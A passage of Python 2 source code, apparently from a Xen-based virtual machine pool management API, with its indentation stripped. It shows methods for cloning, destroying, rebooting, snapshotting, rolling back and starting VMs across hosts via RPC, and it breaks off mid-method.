if not domuuid:
log.exception('WARNING: VM_clone_MAC, domuuid not return!!!')
domuuid = newuuid
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone MAC')
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
log.debug('VM_clone_local_MAC >>>>>')
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid = newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_MAC
'''
log.debug('in _VM_clone_MAC')
xendom = XendDomain.instance()
domuuid = xendom.domain_clone_MAC(vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = XendTask.log_progress(0, 100, xendom.domain_clone_MAC, vm_ref, newname, mac_addr,\
# vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
def VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Clone VM system VDI
@param session: session of RPC.
@param vm_ref: VM's uuid
@param newuuid: new VDI uuid
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_clone_system_VDI', vm_ref, newuuid)
else:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
def _VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_system_VDI
'''
try:
storage = self._get_BNStorageAPI_instance()
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value')
if sys_vdi:
vdi_uuid_map = { sys_vdi : newuuid }
new_vdi = storage.VDI_clone(session, vdi_uuid_map, newuuid, newuuid).get('Value')
if new_vdi:
return xen_api_success(new_vdi)
else:
return xen_api_error(['VM_clone_system_VDI', ' Failed'])
else:
return xen_api_error(['VM_clone_system_VDI', ' orig VDI not found!'])
except Exception, exn:
log.debug(exn)
storage.VDI_destroy(session, newuuid)
return xen_api_error(['VM_clone_system_VDI', ' Exception'])
def VM_destroy(self, session, vm_ref, del_vdi=False, del_ha_sxp=True, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Destroy the specified VM. The VM is completely removed from the system.
This function can only be called when the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param del_vdi: True | False, destroy VM's VDIs either
@param del_ha_sxp: True | False, destroy sxp file in HA dir.
@param update_pool_structs: True | False, update_pool_structs in Xend memory structure.
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
storage = self._get_BNStorageAPI_instance()
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
log.debug("destroy local vm: %s" % vm_ref)
return xen_rpc_call(host_ip, 'VM_destroy_local', vm_ref, True)
if cmp(host_ref, XendNode.instance().uuid) == 0:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
else:
vdis = xen_rpc_call(host_ip, 'VDI_get_by_vm', vm_ref).get('Value')
response = xen_rpc_call(host_ip, 'VM_destroy', vm_ref, del_vdi, del_ha_sxp, update_pool_structs)
if update_pool_structs:
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
## host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
# xen_rpc_call(host_ip, 'VDI_destroy', vdi, True)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_destroy_local(session, vm_ref, del_vdi)
else:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
if del_vdi and vdis:
# host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
return response
def VM_destroy_local(self, session, vm_ref, del_vdi=False):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, False)
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
for vdi in vdis:
storage._VDI_destroy(session, vdi)
return response
def _VM_destroy(self, session, vm_ref, del_ha_sxp=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# vifs = dom.get_vifs()
# if vifs:
# for vif in dom.get_vifs():
# self._VM_del_ip_map(session, vm_ref, vif)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_delete", vm_ref, del_ha_sxp, update_pool_structs)
def VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param label: label(uuid or name) of VM
@param exactMatch: full match the given label
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
all_vms = self._VM_get_lost_vm_by_label(session, label, exactMatch).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_label', label, exactMatch)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_label(session, label, exactMatch)
def _VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_label
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_label(label, exactMatch))
def VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param date1: date of start
@param date2: date of end
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
now_vms = []
all_vms = self._VM_get_lost_vm_by_date(session, date1, date2).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_date', date1, date2)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
now_vms_resp = self.VM_get_all(session)
if cmp(now_vms_resp['Status'], 'Success') == 0:
now_vms = now_vms_resp.get("Value")
if now_vms:
for i in all_vms.keys():
vm_uuid_s = re.search("\/(S+)\/", i)
if i in now_vms:
del all_vms[i]
continue
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_date(session, date1, date2)
def _VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_date
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_date(date1, date2))
def VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown and immediately restart the VM.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_reboot(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_reboot', vm_ref)
else:
return self._VM_hard_reboot(session, vm_ref)
def _VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_reboot
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_reset", vm_ref)
def VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_shutdown(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_shutdown', vm_ref)
i = 0
time_out = 120
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref)['Value']
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
break
elif cmp(i, time_out) > 0:
break
else:
time.sleep(0.5)
continue
else:
return self._VM_hard_shutdown(session, vm_ref)
def _VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_shutdown
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_destroy", vm_ref)
def VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_pause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_pause', vm_ref)
else:
return self._VM_pause(session, vm_ref)
def _VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_pause", vm_ref)
# do snapshot for system vdi of vm
def VM_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Take a snapshot of VM's system VDI. The sragent running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_snapshot_vdi(session, vdi_ref, name)
# snapshot for vdi of vm
def _VM_snapshot_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.exception('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record(session, sr).get('Value')
if not sr_rec:
log.exception('Get SR record failed!')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
log.debug('gpfs snapshot>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_gpfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_mfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.snapshot(sr, vdi_ref, name)
log.debug("snapshot result : %s " % result)
return xen_api_success(result)
def VM_rollback(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Rollback a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_rollback_vdi(session, vdi_ref, name)
def _VM_rollback_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_rollback
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
log.debug('rollback gpfs>>>>>')
p_location = vdi_rec['location'].split(':')[1]
index = p_location.rfind('/')
if index != -1:
file_name = p_location[index+1:]
new_location = p_location[:index+1] + name + p_location[index+1:]
snap_location = '%s/%s/.snapshots/%s/%s' %(sr_rec['location'], vdi_ref, \
name, file_name)
log.debug('=====>VM rollback :snap location %s=====' % snap_location)
log.debug('new_location: %s' % new_location)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_gpfs(snap_location, new_location, p_location)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.rollback(sr, vdi_ref, name)
log.debug("rollback result : %s " % result)
return xen_api_success(result)
def VM_destroy_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Destroy a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_vdi_snapshot(session, vdi_ref, name)
def VM_destroy_all_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Destroy all snapshots of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_all_vdi_snapshots(session, vdi_ref)
def _VM_destroy_all_vdi_snapshots(self, session, vdi_ref, sr = None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_all_snapshots
'''
storage = self._get_BNStorageAPI_instance()
if not sr:
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_all_gpfs(gpfs_name, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_mfs(mfs_name, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy_all(sr, vdi_ref)
log.debug("destroy_snapshot result : %s " % result)
if result == True: # destroy succeed
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def _VM_destroy_vdi_snapshot(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_gpfs(gpfs_name, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
log.debug(name)
result = proxy.destroy_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy(sr, vdi_ref, name)
log.debug("destroy_snapshot result : %s " % result)
# if thereis not snapshots and vdi is not in relation with vm
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
snap_num = len(self._VM_get_vdi_snapshots(session, vdi_ref).get('Value'))
if snap_num == 0:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_resume(session, vm_ref, start_paused)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_resume', vm_ref, start_paused)
else:
return self._VM_resume(session, vm_ref, start_paused)
def _VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_resume", vm_ref,
start_paused = start_paused)
def VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_start(session, vm_ref, start_paused, force_start)
else:
return xen_rpc_call(host_ip, 'VM_start', vm_ref, start_paused, force_start)
else:
return self._VM_start(session, vm_ref, start_paused, force_start)
def _VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_start
'''
if not self._VM_can_start(session, vm_ref):
return xen_api_error(['MEMORY_NOT_ENOUGH', 'VM', vm_ref])
crush_vm = self._VM_check_fibers_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['FIBER_IN_USE:', crush_vm])
crush_vm = self._VM_check_usb_scsi_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['USB_IN_USE:', crush_vm])
try:
log.debug("VM starting now....")
response = XendTask.log_progress(0, 100, do_vm_func,
"domain_start", vm_ref,
start_paused=start_paused,
force_start=force_start)
log.debug(response)
return response
except HVMRequired, exn:
log.error(exn)
return xen_api_error(['VM_HVM_REQUIRED', vm_ref])
#add by wufan
def VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check specified VM can start or not, check host free memory.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict
@raise xen_api_error:
'''
return xen_api_success(self._VM_can_start(session, vm_ref))
def _VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_can_start
'''
host_mem_free = self._host_metrics_get_memory_free()
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if not dominfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['VM_NOT_FOUND', 'VM', vm_ref])
if self._VM_get_is_a_template(session, vm_ref).get('Value'):
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
dom_mem = dominfo.get_memory_dynamic_max()
free_memory = int(host_mem_free) - int(dom_mem)
log.debug("can start: %s, memory left limit: %sG" % (str(cmp(free_memory, RESERVED_MEM) > 0), str(RESERVED_MEM/1024/1024/1024)))
log.debug("free memory: %sG" % str(free_memory/1024/1024/1024))
# by henry, dom0 memory should greate than 4G
if cmp(free_memory, RESERVED_MEM) > 0:
return True
else:
return False
def _host_metrics_get_memory_free(self):
'''
@author: wuyuewen
@summary: Internal method.
@see: host_metrics_get_memory_free
'''
node = XendNode.instance()
xendom = XendDomain.instance()
doms = xendom.list()
doms_mem_total = 0
for dom in doms:
if cmp(dom.get_uuid(), DOM0_UUID) == 0:
continue
dominfo = xendom.get_vm_by_uuid(dom.get_uuid())
doms_mem_total += dominfo.get_memory_dynamic_max()
# log.debug("doms memory total: " + str(doms_mem_total))
# log.debug("host memory total:" + str(node.xc.physinfo()['total_memory'] * 1024))
return node.xc.physinfo()['total_memory'] * 1024 - doms_mem_total
'''
check whether vif is create and up
'''
def _VM_check_vif_up(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('check if vif up >>>>>>>>>>')
# get vm domid
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
vif_num = len(dominfo.get_vifs()) # get num of vifs
log.debug('vm(%) domid(%s) has %s vifs' % (vm_ref, domid, vif_num))
for eth_num in range(vif_num):
vif_dev = 'vif%s.%s' % (domid, eth_num)
vif_emu_dev = 'vif%s.%-emu' %(domid, eth_num)
# def _VM_check_fiber(self, session, vm_ref):
# if self._VM_check_fibers_valid(session, vm_ref).get('Value'):
# return True
# else :
# log.debug('fiber device in use')
# return False
def VM_start_on(self, session, vm_ref, host_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM on specified Host. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param host_ref: Host's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
# import threading
# lock = threading.Lock()
# lock.acquire()
#self.__init_lock__.acquire()
try:
log.debug("in VM_start_on: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return self.VM_start(session, vm_ref, start_paused, force_start)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
log.debug(h_ip)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_start_on ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = self._VM_start(session, vm_ref, start_paused, force_start)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
log.debug("vm dest: node, vm now: master")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = self.VM_start(session, vm_ref, start_paused, force_start)
else:
log.debug("-----condition 5-----")
log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref)
log.debug("Finished start on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return self.VM_start(session, vm_ref, start_paused, force_start)
except Exception, exn:
log.exception(traceback.print_exc())
return xen_api_error(['START_ON_FAILED,', exn])
finally:
